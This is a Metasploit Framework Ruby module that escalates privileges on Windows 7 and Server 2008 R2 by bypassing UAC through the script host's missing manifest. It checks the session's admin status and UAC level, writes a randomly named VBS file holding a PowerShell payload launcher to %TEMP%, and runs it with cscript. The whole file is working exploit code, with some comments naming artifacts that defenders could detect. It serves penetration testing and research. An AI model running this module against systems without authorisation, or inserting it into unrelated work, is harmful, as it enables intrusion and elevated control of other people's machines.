GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
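# Local privilege-escalation module: UAC bypass via the Windows Script Host
# binaries (cscript/wscript.exe). Observable host-side behaviour, all of it
# visible in the code below: a randomly named 8-letter .vbs is written to
# %TEMP%, launched with `cscript.exe //B`, and the PowerShell payload launcher
# is embedded in that script in place of the template's COMMAND placeholder.
# The dropped file is registered for cleanup. Only Windows 7 / Server 2008 R2
# pass the version gate, and the 'Always Notify' UAC levels are refused.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::FileDropper
  include Exploit::Powershell
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Runas

  # Module metadata. The two URL references point at the original write-up
  # and the proof-of-concept repository the technique comes from.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
        'Description' => %q{
          This module will bypass Windows UAC by utilizing the missing .manifest on the script host
          cscript/wscript.exe binaries.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Vozzie',
          'Ben Campbell'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],
          ['URL', 'https://github.com/Vozzie/uacscript']
        ],
        'DisclosureDate' => '2015-08-22',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Entry point. Every precondition check raises through fail_with before
  # anything is written to the target, so a host that is not vulnerable (or a
  # session that is already elevated) is left untouched.
  def exploit
    # Validate that we can actually do things before we bother
    # doing any more work
    validate_environment!
    check_permissions!

    # Only TEMP is consumed below (the previous WINDIR lookup was unused);
    # a single get_envs call keeps the session round trips to one.
    env_vars = get_envs('TEMP')

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      # The prompt-always levels are not bypassed by this technique; stop
      # here rather than drop a script that would only trigger the prompt.
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      # No prompt configured: a plain ShellExecute "runas" (Post::Windows::Runas)
      # is enough and no VBS is written on this path.
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # Artifact on disk: %TEMP%\<8 random letters>.vbs, removed on cleanup by
    # upload_vbs. The cscript.exe //B launch of a script in %TEMP% is the
    # process-creation event a defender would key on.
    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

    upload_vbs(vbs_filepath)

    cmd_exec("cscript.exe //B #{vbs_filepath}")
  end

  # Checks group membership and integrity level of the current session.
  #
  # A nil result from is_in_admin_group? (whoami missing or failed) is
  # reported but not fatal; a false result and a low integrity level both
  # abort via fail_with(Failure::NoAccess).
  def check_permissions!
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    return unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]

    fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
  end

  # Reads the bypass.vbs template from the framework data directory, swaps
  # its COMMAND placeholder for the PowerShell payload launcher and writes
  # the result to payload_filepath on the target.
  #
  # @param payload_filepath [String] destination path on the target
  # @raise via fail_with(Failure::BadConfig) when the template has no COMMAND
  #   placeholder, and fail_with(Failure::Unknown) when the Meterpreter write
  #   fails
  def upload_vbs(payload_filepath)
    vbs = File.read(File.join(Msf::Config.data_directory,
                              'exploits',
                              'scripthost_uac_bypass',
                              'bypass.vbs'))

    # remove_comspec: true yields the launcher without the cmd.exe wrapper;
    # presumably the template invokes it directly — confirm against bypass.vbs.
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

    # Block form: a String replacement passed to gsub! has backreference
    # escapes (\\, \0, ...) interpreted, which would corrupt a generated
    # command containing backslashes. The block inserts it verbatim.
    # gsub! returns nil when nothing matched, which would otherwise upload
    # the unmodified template silently.
    unless vbs.gsub!('COMMAND') { command }
      fail_with(Failure::BadConfig, 'bypass.vbs template has no COMMAND placeholder')
    end

    print_status('Uploading the Payload VBS to the filesystem...')
    begin
      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
      write_file(payload_filepath, vbs)
      # Make sure the dropped script is deleted when the module cleans up.
      register_file_for_cleanup(payload_filepath)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
    end
  end

  # Preflight gate. Aborts via fail_with when the session is already
  # elevated, when the OS is not Windows 7 / Server 2008 R2, or — with UAC
  # disabled — when the user is not in the Administrators group.
  def validate_environment!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    version = get_version_info
    if version.win7_or_2008r2?
      print_good("#{version.product_name} may be vulnerable.")
    else
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
    end

    if is_uac_enabled?
      print_status('UAC is Enabled, checking level...')
    elsif !is_in_admin_group?
      # UAC off: without group membership there is nothing to escalate from.
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end
  end
end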